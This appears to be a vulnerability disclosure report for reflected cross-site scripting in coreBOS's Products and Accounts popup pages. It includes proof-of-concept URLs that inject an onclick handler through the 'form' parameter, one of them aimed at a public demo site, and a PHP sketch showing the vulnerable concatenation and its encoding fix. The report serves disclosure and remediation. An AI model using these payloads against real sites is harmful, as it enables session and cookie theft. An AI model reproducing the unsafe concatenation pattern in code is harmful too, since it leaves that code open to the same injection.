Reflected XSS on the Products Modules in tsolucio/corebos
Valid
Reported on Jun 25th 2022
Description
coreBOS is vulnerable to reflected XSS in the Products modules. The HTML tag can be escaped with the double-quote character ("), which lets an attacker perform reflected XSS.
Proof of Concept
- Login to coreBOS
- Go to
http://localhost:8888/corebos/index.php?module=Products&action=Popup&html=Popup_picker&form=rel=%22canonical%22+accesskey=%22X%22+onclick=%22alert(1)%22xxx&forfield=product_id&srcmodule=Campaigns&forrecord=
Or:
http://localhost:8888/corebos/index.php?module=Accounts&action=Popup&popuptype=specific_account_address&form=rel=%22canonical%22+accesskey=%22X%22+onclick=%22alert(1)%22xxx&form_submit=false&fromlink=
- Press ALT+SHIFT+X on Windows or CTRL+ALT+X on OS X
Impact
An attacker can execute JavaScript in the web application and, for example, steal cookies.
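The quote breakout described above and its fix, as an added example that is not coreBOS code or part of the original report. The hidden-input markup and the function names are assumptions; the sample value is the `form` parameter from the proof of concept, URL-decoded.

```php
<?php
// Added illustration; not coreBOS source. Markup and function names are hypothetical.

// Vulnerable pattern: a request value concatenated into a double-quoted attribute.
// A literal " in the value ends the attribute, and the rest is parsed as new attributes.
function render_unsafe(string $form): string
{
    return '<input type="hidden" name="form" value="' . $form . '">';
}

// Hardened: encode for the attribute context. ENT_QUOTES encodes both " and ',
// so the value can no longer close the attribute it is written into.
function render_encoded(string $form): string
{
    $safe = htmlspecialchars($form, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="form" value="' . $safe . '">';
}

// Stricter: treat the form name as an identifier and reject anything else
// before it reaches the template (assumed naming rule, adjust to the application).
function validate_form_name(string $form): ?string
{
    return preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $form) === 1 ? $form : null;
}

// Value of the `form` parameter from the proof of concept, URL-decoded.
$poc = 'rel="canonical" accesskey="X" onclick="alert(1)"xxx';

echo render_unsafe($poc), PHP_EOL;   // request-supplied attributes land on the tag
echo render_encoded($poc), PHP_EOL;  // the whole value stays inside value="..."
var_dump(validate_form_name($poc));        // fails the identifier check
var_dump(validate_form_name('EditView'));  // constructed sample of a plain form name
```

Output encoding belongs at every place the parameter is echoed; the allowlist check is an extra layer, not a replacement for it.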
We are processing your report and will contact the tsolucio/corebos team within 24 hours.
a year ago
Hi Team,
To easily reproduce the issue you can go to:
https://demo.corebos.com/index.php?module=Products&action=Popup&html=Popup_picker&form=rel=%22canonical%22+accesskey=%22X%22+onclick=%22alert(document.domain)%22xxx&forfield=product_id&srcmodule=Campaigns&forrecord=
and then (Press ALT+SHIFT+X on Windows) or (CTRL+ALT+X on OS X)
Thanks, @apapedulimu
Nosa Shandy modified the report
a year ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back
a year ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days.
a year ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days.
a year ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale.
a year ago
The researcher's credibility has increased: +7